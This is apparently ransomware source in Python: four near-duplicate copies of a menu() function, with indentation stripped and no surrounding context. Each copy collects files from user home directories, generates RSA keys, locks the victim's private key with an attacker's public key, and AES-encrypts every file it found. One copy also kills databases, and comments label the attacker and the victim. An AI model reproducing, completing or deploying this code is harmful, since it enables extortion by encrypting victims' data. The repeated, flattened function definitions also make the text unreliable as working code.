def menu():
try:
os.mkdir(variables.ransomware_path)
except OSError:
pass
kill_databases()
files = get_files.find_files(variables.test_path)
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
variables.server_public_key)
with open(variables.encrypted_client_private_key_path, 'wb') as output:
pickle.dump(encrypted_client_private_key, output, pickle.HIGHEST_PROTOCOL)
with open(variables.client_public_key_path, 'wb') as f:
f.write(Client_public_key)
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
with open(variables.aes_encrypted_keys_path, 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()
def menu():
files = get_files.find_files(
variables.home) + get_files.find_files("/home/")
# os.mkdir("/hdd")
# mount("/dev/sda1", "/hdd")
# files = get_files.find_files("/hdd/home/ubuntu-sandbox")
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(
Client_private_key, variables.server_public_key)
with open(variables.encrypted_client_private_key_path, 'wb') as output:
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
with open(variables.client_public_key_path, 'wb') as f:
f.write(Client_public_key)
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
with open(variables.aes_encrypted_keys_path, 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()
def menu():
# create ransomware directory
try:
os.mkdir(ransomware_path, 0700)
except OSError:
pass
# get the files in the home directory
# /home/$USER
files = get_files.find_files(test_path)
# create RSA object
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
server_public_key_object = RSA.importKey(server_public_key)
Client_private_key = rsa_object.private_key_PEM
Client_public_key = rsa_object.public_key_PEM
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
server_public_key)
# save encrypted client private key to disk
with open(ransomware_path + '/encrypted_client_private_key.key',
'wb') as output:
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
# save client public key to disk
with open(ransomware_path + "/client_public_key.PEM", 'wb') as f:
f.write(Client_public_key)
# Free the memory from keys
Client_private_key = None
rsa_object = None
gc.collect()
del rsa_object
del Client_private_key
# Get the client public key back as object
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
# encrypt with the client public key
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
# free the old AES keys
aes_keys_and_base64_path = None
gc.collect()
del aes_keys_and_base64_path
# save to disk -> ENC(AES) BASE64(PATH)
with open(ransomware_path + "/AES_encrypted_keys.txt", 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " " + _[1] + "\n"
f.write(line)
enc_aes_key_and_base64_path = None
gc.collect()
del enc_aes_key_and_base64_path
def menu():
# create ransomware directory
try:
os.mkdir(ransomware_path, 0o700)
except OSError:
pass
# get the files in the home directory
# /home/$USER
files = get_files.find_files(home)
# create RSA object
rsa_object = asymmetric.assymetric()
rsa_object.generate_keys()
# Here is the public key of the attacker.
server_public_key_object = RSA.importKey(server_public_key)
# Get victim's private key
Client_private_key = rsa_object.private_key_PEM
# Get victim's public key
Client_public_key = rsa_object.public_key_PEM
# encryp victim's private key & attacker's public key with attacker's public key.
# So, only attacker can read them.
# I don't know why server_public_key is included. Maybe, the server side need this info later.
encrypted_client_private_key = encrypt_priv_key(Client_private_key,
server_public_key)
# save encrypted client private key to disk
with open(ransomware_path + '/encrypted_client_private_key.key',
'wb') as output:
# serialize and write to the file.
pickle.dump(encrypted_client_private_key, output,
pickle.HIGHEST_PROTOCOL)
# save client public key to disk
with open(ransomware_path + "/client_public_key.PEM", 'wb') as f:
f.write(Client_public_key)
# Free the memory from keys
Client_private_key = None
rsa_object = None
del rsa_object
del Client_private_key
gc.collect()
# Get the client public key back as object
client_public_key_object = RSA.importKey(Client_public_key)
client_public_key_object_cipher = PKCS1_OAEP.new(client_public_key_object)
# FILE ENCRYPTION STARTS HERE !!!
aes_keys_and_base64_path = start_encryption(files)
enc_aes_key_and_base64_path = []
# The aes_keys_and_based_64_path is a list of tuples.
# Each tuple is a (key, path) pair.
# That is, each compromised file associated with an individual key.
for _ in aes_keys_and_base64_path:
aes_key = _[0]
base64_path = _[1]
# encrypt with the client public key. For signature purpose.
encrypted_aes_key = client_public_key_object_cipher.encrypt(aes_key)
# So, you got lots of key,path pairs signed.
enc_aes_key_and_base64_path.append((encrypted_aes_key, base64_path))
# free the old AES keys
aes_keys_and_base64_path = None
del aes_keys_and_base64_path
gc.collect()
# save to disk -> ENC(AES) BASE64(PATH)
with open(ransomware_path + "/AES_encrypted_keys.txt", 'w') as f:
for _ in enc_aes_key_and_base64_path:
line = base64.b64encode(_[0]) + " ".encode() + _[1] + "\n".encode()
f.write(line.decode())
enc_aes_key_and_base64_path = None
del enc_aes_key_and_base64_path
gc.collect()